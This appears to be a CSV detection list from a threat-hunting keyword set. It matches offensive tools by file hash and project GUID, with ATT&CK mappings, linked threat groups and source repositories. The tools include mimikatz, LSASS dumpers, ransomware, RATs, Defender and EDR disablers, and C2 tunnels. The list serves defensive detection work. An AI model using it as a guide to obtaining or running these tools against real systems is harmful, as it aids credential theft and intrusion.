"*a5da70fc881d99acc6cfc396eac2ed67957e89831a202e8610f3f48e2f181d8b*",".{0,1000}a5da70fc881d99acc6cfc396eac2ed67957e89831a202e8610f3f48e2f181d8b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32564" "*a5db22a3b93fb89ea64a3027801002e968ab7d11e43b2c8e5173b33ac8fbb8eb*",".{0,1000}a5db22a3b93fb89ea64a3027801002e968ab7d11e43b2c8e5173b33ac8fbb8eb.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","32565" "*a5e057e11af84fb4e663c3d1f580dc6df73c2cca29bb63008717590f0d53883f*",".{0,1000}a5e057e11af84fb4e663c3d1f580dc6df73c2cca29bb63008717590f0d53883f.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","32567" "*a5e673ab3d8d4159b611981668487376eb2c61e3e3715dea1b50ec18d64eef76*",".{0,1000}a5e673ab3d8d4159b611981668487376eb2c61e3e3715dea1b50ec18d64eef76.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32569" "*a5e835c60f19233f4adf294821bbd82663e185ccd38444993e7be983235760af*",".{0,1000}a5e835c60f19233f4adf294821bbd82663e185ccd38444993e7be983235760af.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","32570" "*a5ebda39b87ecf276f28faaccef680a07435906f81001ff69cbe6acefe345ca6*",".{0,1000}a5ebda39b87ecf276f28faaccef680a07435906f81001ff69cbe6acefe345ca6.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","32572" "*a5f10cdd2cd38b2b33a091c60f0e194aafd3a2de3ccbf80333882430a90034b6*",".{0,1000}a5f10cdd2cd38b2b33a091c60f0e194aafd3a2de3ccbf80333882430a90034b6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32573" "*A5FDFE2A253B751DA1A84A41A2B501648735D027E03882CF363ACE84FE235034*",".{0,1000}A5FDFE2A253B751DA1A84A41A2B501648735D027E03882CF363ACE84FE235034.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","32575" "*a60723c287985d0ff660c28a9558dc511a5be3cd2171778e2068f2950934e0c6*",".{0,1000}a60723c287985d0ff660c28a9558dc511a5be3cd2171778e2068f2950934e0c6.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","32576" "*a60858741df25450db9e46aa870a04fc3be70028fca27cb75b89f642e3ef31e4*",".{0,1000}a60858741df25450db9e46aa870a04fc3be70028fca27cb75b89f642e3ef31e4.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 
- TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32577" "*a60a04cda101deaab5c2aa8b25c715fffc7a4f3e9813fa6d53a5b25dd4126fe2*",".{0,1000}a60a04cda101deaab5c2aa8b25c715fffc7a4f3e9813fa6d53a5b25dd4126fe2.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#filehash","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","32578" "*a60cd6fd8facc92366caa76747ede2aba9c04a166f55d1ae6b84b264d0f2e5b1*",".{0,1000}a60cd6fd8facc92366caa76747ede2aba9c04a166f55d1ae6b84b264d0f2e5b1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32579" "*a611f2d2b08ad8bffc69e578d6a99302114002e143b80f0bde003db299822b84*",".{0,1000}a611f2d2b08ad8bffc69e578d6a99302114002e143b80f0bde003db299822b84.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash 
#linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","32580" "*a615cf0f8929fd2950964a454bfb9ccdbd23c4ddda337035c9daa3ecb03859fe*",".{0,1000}a615cf0f8929fd2950964a454bfb9ccdbd23c4ddda337035c9daa3ecb03859fe.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32581" "*a6176293011e6a61923c609c63925c47b0f1f9b5465b451148e4813969d850b8*",".{0,1000}a6176293011e6a61923c609c63925c47b0f1f9b5465b451148e4813969d850b8.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","32582" "*a622eda2b4d3ea644a4563610e594e8e192d79ab2a135c6a4fd2e3f4a707f1b5*",".{0,1000}a622eda2b4d3ea644a4563610e594e8e192d79ab2a135c6a4fd2e3f4a707f1b5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","32583" "*A62776D0-CF96-4067-B4BE-B337AB6DFF02*",".{0,1000}A62776D0\-CF96\-4067\-B4BE\-B337AB6DFF02.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#GUIDproject","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","32584" "*a62e9af706a0c4c9ebb26a1d33e4b5de10fb07f00e4e03699fa5038dbe479c92*",".{0,1000}a62e9af706a0c4c9ebb26a1d33e4b5de10fb07f00e4e03699fa5038dbe479c92.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32585" "*a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade*",".{0,1000}a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32586" "*a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade*",".{0,1000}a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32587" "*a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade*",".{0,1000}a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome 
Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32588" "*a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade*",".{0,1000}a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32589" "*a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade*",".{0,1000}a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32590" "*a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade*",".{0,1000}a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32591" 
"*a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade*",".{0,1000}a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32592" "*a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade*",".{0,1000}a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32593" "*a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade*",".{0,1000}a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32594" "*a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade*",".{0,1000}a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32595" "*a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade*",".{0,1000}a63286b5edfb067380313b382e077d2a5a671f1fa204f070a9a5513a01857ade.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32596" "*a63a403167d39341c7a116a1f8d599d19859743cbb254ba6203733213081913f*",".{0,1000}a63a403167d39341c7a116a1f8d599d19859743cbb254ba6203733213081913f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32597" "*a63bf8aa62471b0cb62919e6e387482895a8027d5f763aba5f76572a595d7a31*",".{0,1000}a63bf8aa62471b0cb62919e6e387482895a8027d5f763aba5f76572a595d7a31.{0,1000}","offensive_tool_keyword","SharpExShell","SharpExShell automates the DCOM lateral movment technique which abuses ActivateMicrosoftApp method of Excel application","T1021.003 - T1218.007 - T1127.001","TA0008 - TA0009 - TA0005","N/A","N/A","Lateral Movement","https://github.com/grayhatkiller/SharpExShell","1","0","#filehash","N/A","8","1","70","15","2024-05-01T23:17:25Z","2023-10-30T18:16:41Z","32599" "*a63e1dbd23bbc640410dd811ab84e179b741080c4b4d8b5e08e5622d79884e38*",".{0,1000}a63e1dbd23bbc640410dd811ab84e179b741080c4b4d8b5e08e5622d79884e38.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 
- T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32600" "*a642aacd4cfc3cbee64a1989d7ae19f8fe8eb99c77292186c98d477c6846e300*",".{0,1000}a642aacd4cfc3cbee64a1989d7ae19f8fe8eb99c77292186c98d477c6846e300.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32601" "*a644596787f407d005d3de5a3e02316c788b40dec8c5fdd0b4c010edc771677f*",".{0,1000}a644596787f407d005d3de5a3e02316c788b40dec8c5fdd0b4c010edc771677f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32602" "*a6465053e2254234650641bb53a2d2f3596439199a8496d724332b7f6d54d5b3*",".{0,1000}a6465053e2254234650641bb53a2d2f3596439199a8496d724332b7f6d54d5b3.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32604" "*a6479f37d1ab80d878c949e10b1b44cd7714c87a67da40c438237af0501de51f*",".{0,1000}a6479f37d1ab80d878c949e10b1b44cd7714c87a67da40c438237af0501de51f.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#filehash","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","32605" "*A6497C83-7DC7-4E48-87BA-FB5DFAABE3C9*",".{0,1000}A6497C83\-7DC7\-4E48\-87BA\-FB5DFAABE3C9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32606" "*a64ce5fa2df81f51e5f477e07f2d5f4c59f9fb045e575a497c2d206233c2f118*",".{0,1000}a64ce5fa2df81f51e5f477e07f2d5f4c59f9fb045e575a497c2d206233c2f118.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32607" "*A64EF001-BE90-4CF5-86B2-22DFDB49AE81*",".{0,1000}A64EF001\-BE90\-4CF5\-86B2\-22DFDB49AE81.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. 
Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","32608" "*a650ad2f9d7d9ee450f8fd0926b0ec9512d02f2fbd96f4338549f5064519f9e6*",".{0,1000}a650ad2f9d7d9ee450f8fd0926b0ec9512d02f2fbd96f4338549f5064519f9e6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32609" "*a65acb163d08410f58a84447f9a615c45219343e637a1853dc29a2e79ff2f112*",".{0,1000}a65acb163d08410f58a84447f9a615c45219343e637a1853dc29a2e79ff2f112.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","32610" "*a65b022127a9e19bdb6e119e020cf70a89c4d59a156b8040d74a8f489dc490c2*",".{0,1000}a65b022127a9e19bdb6e119e020cf70a89c4d59a156b8040d74a8f489dc490c2.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - 
T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32611" "*a65b022127a9e19bdb6e119e020cf70a89c4d59a156b8040d74a8f489dc490c2*",".{0,1000}a65b022127a9e19bdb6e119e020cf70a89c4d59a156b8040d74a8f489dc490c2.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - 
TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32612" "*A663D4C5-BC01-42A6-9C65-52F0524B4AB7*",".{0,1000}A663D4C5\-BC01\-42A6\-9C65\-52F0524B4AB7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32614" "*a6700f4b04050a66b236f7af62999e865573a72c876b6de8d31dfebb47991f1d*",".{0,1000}a6700f4b04050a66b236f7af62999e865573a72c876b6de8d31dfebb47991f1d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32616" "*a6730ebb3e91961283f7a1cd95ace2a6d0d55e50531a64e57b03e61a8cf2d0e7*",".{0,1000}a6730ebb3e91961283f7a1cd95ace2a6d0d55e50531a64e57b03e61a8cf2d0e7.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files 